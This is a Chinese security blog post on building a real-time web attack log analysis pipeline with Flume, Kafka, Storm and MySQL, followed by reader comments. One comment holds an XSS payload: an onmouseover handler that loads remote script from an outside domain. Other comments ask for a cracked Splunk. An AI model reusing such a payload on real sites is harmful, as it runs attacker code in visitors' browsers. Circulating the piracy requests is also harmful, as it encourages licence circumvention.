Web攻击日志分析的过去现在与未来


0x00:前言


谈到日志分析大多数人的感觉是这是一个事后行为,场景当黑客成功将网站黑了。运营人员发现的时候安全人员会介入分析入侵原因,通过分析黑客攻击行为往往会回溯最近几天甚至更加久远的日志。

0x01:处理过程。


个人认为日志分析的过程分为3个阶段:

• 过去:

在之前很多网站的运营日志并不多少,只有几G多的可能几十,上百G,当出现了攻击行为时,利用grep、perl或者python脚本可以来完成,但这也是基本偏向于事后阶段。原始阶段,通过grep关键字来发现异常,这样并不能达到实时分析的结果,往往也是需要到出事后才能介入。 在后来,我们在服务器上部署了perl脚本想通过实时tail日志来发现攻击者的行为从而进行一个好的分析。这里的问题是对服务器负载压力大,运维人员未必会协助你部署,比较苦逼。那么我们能否在事前阶段介入呢? 答案是有的,通过下文介绍的方法来逐步实现。

• 现在:

现在是大数据时代数据的最根本的体现就是大,随着电子商务的兴起。每天日志量上亿或者上十几亿基本成为了主流,如果还是依赖之前的脚本或者grep根本无法完成既定的分析,更谈不上能实时分析。

大数据给我们带来了很多针对大量数据处理的方案,比如hive(离线分析)、storm(实时分析框架)、impala(实时计算引擎)、haddop(分布式计算)、以及hbase,spark这样的技术。

那么在有了数据之前,我们应该做点什么能够支撑我们的安全数据分析平台呢?

我觉得可以分为几个阶段来进行:

数据收集。

数据处理。

数据实时计算。

数据存储 分为2个部分:离线和实时。

首先第一点没有数据的话,就不要往下看了。

安全分析的基础是数据,所有的数据来源都源自web日志,从业务的角度来说,这些都是业务日志,但是在我的眼里这些数据是“蜜罐”。

日志当中存在好的坏的人,我们的目标就是从中筛出坏人。

基于大数据的技术如此多,通过架构及技术选型,选择的数据类型是这样:

数据收集通过flume实现,数据订阅使用kafka来实现,数据实时计算框架使用strorm来实现实时处理,数据存储通过2个方面来实现,实时存储和离线存储。

flume: Flume提供对数据进行简单处理,并写到各种数据接受方(可定制)的能力 Flume提供了从console(控制台)、RPC(Thrift-RPC)、text(文件)、tail(UNIX tail)、syslog(syslog日志系统,支持TCP和UDP等2种模式),exec(命令执行)等数据源上收集数据的能力。

kafka: Kafka1是linkedin用于日志处理的分布式消息队列。

storm: 实时计算框架,通过流处理来实现对数据的实时处理,storm具有实时性高、吞吐量大,低延迟,实时等特点,适合的场景是源源不断的数据源。 下图为storm ui界面:

• 日志基本处理:

通过这些方式,我们有了日志后,需要观察日志的格式理解其各个字段的意思,将日志格式化方便进行提取,此处使用正则完成匹配。 比如一段nginx 日志规则:

log_format combined '$remote_addr - $remote_user [$time_local] ' '"$request" $status $body_bytes_sent ' '"$http_referer" "$http_user_agent"';

对于恶意攻击日志,在这里的关键字有哪些用的上呢? $request、$status、$body_bytes_sent、http_user_agent等。

通过格式化整理工作,在有了大量数据后,我们要做的就是尽可能去除眼前的障碍。

这些障碍包括各种扫描,各种爬虫,各种有意无意的入侵行为。

对于基本过滤,我们关注的主要是2个:疑似成功的和不成功的,这些通过日志可以做基本的判别。

HTTP code = 403,404,502,301,这些基本都可以判断为不成功的攻击。

而htttp code 等于200和500状态基本可判断为疑似“成功攻击”。那么在有了这些基础的筛选后,可以去除较多的无用数据。

我们的目标:记住我们要抓的那种隐藏在大量障碍数据下的攻击,并不能仅仅依靠这些来实现分析,这是不专业且不负责任的行为。

规则定制:

通过规则定制,可以结合攻防经验加之前分析过程中发现的问题整理成为规则,加入到storm实时分析job中,来发现攻击行为,将攻击行为入库。发现的多少,完全取决于规则的多少与精准,包括正则的编写, 规则的定制。

Storm规则捕获:

在storm里的实现方式是,通过正则表达式匹配关键字,如:phpinfo。

Storm里的数据流向是storm接入Kafka topic,我们可以通过tupple接收到的数据,将数据做预处理。

这个部分storm是使用prepare来做预处理,这里可以将正则表达式写入到prepare里。

Storm job是使用java编写的,这里匹配phpinfo的代码是:

有了数据的预处理后,需要执行搜索,正则表达式的逻辑就是,非黑即白,有就匹配没有就略过,这里忽略大小写。

Storm 使用execute来做执行层的逻辑判断,通过匹配tupple里是否包含Phpinfo,如果是则显示已找到phpinfo,如果不是则不回显结果。

通过将storm job,上传到Nimbus后,执行结果可发现如下信息,可实时发现phpinfo关键字,storm job的编译使用mvn来做。

最后通过数据库将匹配后的结果输出到数据库内,匹配到的结果是这样子的:

storm 实时计算支持本地调试和远程调试,本地访问http://hostname/phpinfo.php,storm 抓取到的信息:

写入数据库内的信息:

最后写入数据库后信息,可以看到14:23:41秒测试,14:23:49秒插入数据库。

通过Phpinfo 这个关键字匹配到的信息如下:

• 数据可视化:

通过基础的数据分析可以将结果绘成图,这样做的好处可以将攻击的监控时间段拉长不在拘泥于单一的数据库查询,当然不是为了可视化而可视化这就失去不 了了其意义,可视化的目的是为了运营需要。

表不如图,要做的足够好就应该考虑用户体验,但这样的可视化是有用的吗?

答案未必,可视化的目标是为了让别人清晰的看出来你所做的数据分析的真谛。

• 数据存储:

数据分析后,需要有针对性的存储,以备后续联合分析,数据存储主要采用离线和实时,实时主要是提供一天内的攻击趋势展现。

• 数据分析:(重点)

通过将这些规则的检查结果写入数据库,通过数据库查询方式将日志筛选,提炼出攻击时间,攻击ip,攻击次数,ip来源归属地以及一天有哪些时间段攻击最多,由此可以给黑客画一张活动轨迹图。

判断黑客的技术能力,是否是常客,以及作案动机是什么,但比较悲观的是即使分析了这些,对于攻击行为还是需要采取一定的行为,比如把前top20 提取出来封掉。

其次就是攻击行为是否可进一步分析?如果只是这样分析是人人都会的,需要将这些数据结合漏洞来分析比如出现个shellshock漏洞,php cgi远程代码执行漏洞是否能发现?经过一段时间内的分析是可以总结个趋势的。

这一切的重点是特征、关键字,通过关键字势识别,就像识别你是胖的、瘦的、高的、矮的一样,先将你以类别区分出来,然后进行分析。

分析的前提是,先建立表,你想做啥查询,数据库表结构需要设置好,比如:

这里,我们关心的信息是:攻击日志、攻击payload、攻击方法、攻击返回状态、攻击ip、攻击者浏览器指纹。

• 确定分析范围:

需要确定想找到哪些问题?sql注入、xss、文件包含、目录遍历、爆破、各种扫描器扫描。将这些信息汇集后,写入到规则中,通过storm实时计算,运算一段时间我们就会得到各种各样的数据,有了分析的基本样本。

分析,其实就是个汇总的过程,使用mysql就可以完成。

我们所有的分析都是从安全的角度来进行的,所以看看大家感兴趣的内容,有哪些user_agent?这里是awvs的扫描器指纹

各种各样的各种扫描数据:

从数据分析上来看,攻击者似乎对discuz的.bak文件情有独钟。又或者,我们来看看攻击者最热衷哪些phpmyadmin?

以及各种各样的xss:

以及我们熟悉的struts2?

等等这些都是有特征,可被查找到的,查找到了其实不是目标,我们的目标是能不能在智能点?

因为很多的攻击数据,都是无意义的,怎么从这些当中筛选出真正的危险,这部分是自动化测试的范畴,这里先不讲。

通过对这些数据的分析,可以比较轻易的知道有哪些东西是攻击者感兴趣的,以及市面上是否出现了1day被大规模利用。

0x02:未来:


日志分析的未来,一定是以数据为前提的,通过机器学习和数据挖掘算法来实现对日志及攻击趋势的预测。

最后日志分析是个不断进化的过程,不断修炼。

数据库层面的压力比较大,使用Mysql对于千万级别的数据库查询有点不太适合,后续会考虑hbase等来处理。

以及考虑到使用诸如:贝叶斯算法来对历史数据进行评分及策略调整。

评论

小胖子 2014-11-27 10:36:55

屌爆了,我等来抢沙发!

带馅儿馒头 2014-11-27 10:45:31

收藏

M

m1x7e1 2014-11-27 10:48:04

好屌啊,收藏了,回去慢慢看。

S

sky 2014-11-27 11:05:01

屌爆了,我等来抢小胖子

皂皂 2014-11-27 11:09:00

小哥厉害,手动赞

泳少 2014-11-27 11:27:04

[<a href="#" title="]"></a>[" <!-- onmouseover=jQuery.getScript('//20.rs') style="text-decoration:none;display:block;width:2000px;height:2000px;//><!-- -->&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a></a>]

X

xiaoxin 2014-11-27 13:38:45

Wordpress ,这是恶意的吧

I

insight-labs 2014-11-27 14:36:11

"数据库层面的压力比较大,使用Mysql对于千万级别的数据库查询有点不太适合,后续会考虑hbase等来处理。"
我们是放到elastic search里面,4g内存的node每天收集处理1000w日志无压力,每天开一个新index。

W

winsyk 2014-11-27 14:41:05

后续可以试试。

F

Fireweed 2014-11-27 15:12:27

学习了

二哥三摆手 2014-11-27 15:33:43

404最多。。先学习一下

W

wangy3e 2014-11-27 15:50:30

niubiing

秋风 2014-11-27 15:53:58

NB!

路人甲 2014-11-27 16:06:09

很不错呀,感谢分享,就是成本略高,没有资源支撑搞不动,哎

M

missdiog 2014-11-27 17:31:24

一个splunk全部搞定, 4C8G 每天20-40G的日志 毫无压力,各种实时查询各种报表

W

winsyk 2014-11-27 17:55:24

splunk 固然好,但贵啊。

M

missdiog 2014-11-27 22:06:40

用破解版撒,爆破改几个字节而已

小哥 2014-11-28 10:07:20

那个版本的splunk可爆破

路人甲 2014-11-28 10:08:02

哪个版本的splunk可破解?

我了个去 2014-11-28 11:07:06

数据收集、处理+分析、可视化。

H

hkAssassin 2014-11-28 14:48:51

求破解版!!!

老树 2014-11-29 15:41:57

求破解版本。。

小飞侠 2014-12-02 22:50:43

求splunk破解版~

H

HackBraid 2014-12-09 13:28:48

碉堡~

路人甲 2014-12-10 09:00:11

用splunk吧,一个splunk秒杀一切。 还能装各种APP,各种告警,各种日志各种自定义处理。用处多多。自从用了splunk,妈妈再也不用担心日志分析了。

K

ki04dc 2014-12-10 17:54:06

求破解版本的splunk,splunk确实好用,但是下了几个版本都没办法破解

K

ki04dc 2014-12-10 17:55:52

哪个版本的splunk可以破解啊,试过网上的一些办法,测试了一些版本都不可用,代码跟踪了下,发现限制是在二进制程序中的。

路人甲 2014-12-12 10:44:58

winsyk大神,写的太好了,可以让我转载到个人博客吗?

W

winsyk 2014-12-12 10:59:10

可以啊,保留版权就好。

路人甲 2014-12-12 11:19:20

谢谢

爱捣蛋的鬼 2014-12-16 09:38:47

大神,有没有一些nginx的管理工具, 可以提供接口让storm分析日志发现攻击后,动态修改nginx的规则的(比如封IP, 封URL)之类的

W

winsyk 2014-12-16 13:52:36

之前考虑用nginx module来做这个事情,后来也了解到一些公司用nginx-lua 可以做,但没尝试过。

路人甲 2014-12-18 09:26:57

题目真大

登录 2015-03-12 15:28:43

非常好的文章,难得

W

wangy3e 2015-04-05 01:43:27

已破解~~~

路人甲 2015-11-19 09:42:34

@hkAssassin secilog是一体化的日志分析平台,可以分析攻击内容,也可以分析业务内容。关注一下,感谢!

S

sai 2015-12-17 19:57:14

基本思路是这样。但分析的重点还需要干货

W

winsyk 2015-12-29 17:54:10

@sai 分析因人而异,这部分其实是重点看你想解决什么case,就用什么办法。

W

winsyk

越长大越孤单

twitter weibo github wechat

随机分类

数据安全 文章:29 篇
渗透测试 文章:154 篇
木马与病毒 文章:125 篇
其他 文章:95 篇
Java安全 文章:34 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录